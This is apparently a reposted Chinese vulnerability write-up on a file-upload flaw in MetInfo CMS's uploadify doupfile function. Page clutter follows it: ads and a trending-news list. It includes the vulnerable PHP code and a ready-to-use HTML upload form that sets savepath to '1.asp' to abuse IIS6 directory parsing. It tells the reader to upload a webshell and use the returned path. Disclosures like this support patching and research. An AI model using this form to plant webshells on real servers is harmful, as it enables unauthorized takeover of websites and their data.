MetInfo 鸡肋getshell
- 发布时间:2017-01-02
- 公开时间:N/A
- 漏洞类型:文件上传
- 危害等级:高
- 漏洞编号:xianzhi-2017-01-73318655
- 测试版本:N/A
漏洞详情
app/system/include/module/uploadify.class.php 65行public function doupfile(){
global $M;
$this->upfile->set_upfile();
$info['savepath'] = $_M['form']['savepath'];
$info['format'] = $_M['form']['format'];
$info['maxsize'] = $_M['form']['maxsize'];
$info['is_rename'] = $_M['form']['is_rename'];
$info['is_overwrite'] = $_M['form']['is_overwrite'];
$this->set_upload($info);
$back = $this->upload($_M['form']['formname']);
if($_M['form']['type']==1){
if($back['error']){
$back['error'] = $back['errorcode'];
}else{
$backs['path'] = $back['path'];
$backs['append'] = 'false';
$back = $backs;
}
}
echo jsonencode($back);
}
$_M['form']来自$(POST|GET|COOKIE)
savepath可控导致且当目录不存在时自动新建 导致IIS6下解析漏洞getshell
测试方法
<form id="form" action="http://xxxxx.com/app/system/entrance.php?c=uploadify&a=doupfile" method="POST" enctype ="multipart/form-data">
savepath:<input type="text" name="savepath" value="1.asp"><br />
format:<input type="text" name="format" value="rar|zip|sql|doc|pdf|jpg|xls|png|gif|mp3|jpeg|bmp|swf|flv|ico"><br />
maxsize:<input type="text" name="maxsize" value="1111111111111111"><br />
is_rename:<input type="text" name="is_rename" value="0"><br />
is_overwrite:<input type="text" name="is_overwrite" value="1"><br />
formname:<input type="text" name="formname" value="file"><br />
<input type="file" name="file">
<input type="submit" value="submit">
</form>
<br />
选择一个后缀在上面列表中的马submit即可
返回带路径 直接用
作者:索马里的乌贼
链接:https://www.jianshu.com/p/badaa205128f
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 中法元首相会都江堰 7904087
- 2 日方军机滋扰擅闯或被视为训练靶标 7808086
- 3 大闸蟹为何会在欧美泛滥成灾 7712472
- 4 国际机构看中国经济 关键词亮了 7619295
- 5 药酒里泡了十余年的海马竟是塑料 7522894
- 6 12306回应员工用装垃圾的簸箕接开水 7425306
- 7 日军机滋扰辽宁舰训练 中方严正交涉 7333459
- 8 国乒8比1击败日本队 11战全胜夺冠 7235121
- 9 罪犯被判死缓破口大骂被害人一家 7143949
- 10 千吨级“巨无霸”就位 7043870


![王珮寒一位该打的人出现了… [二哈]](https://imgs.knowsafe.com:8087/img/aideep/2024/9/2/d6e1412b03acfa1a264b08d7040158de.jpg?w=250)




HackerEye
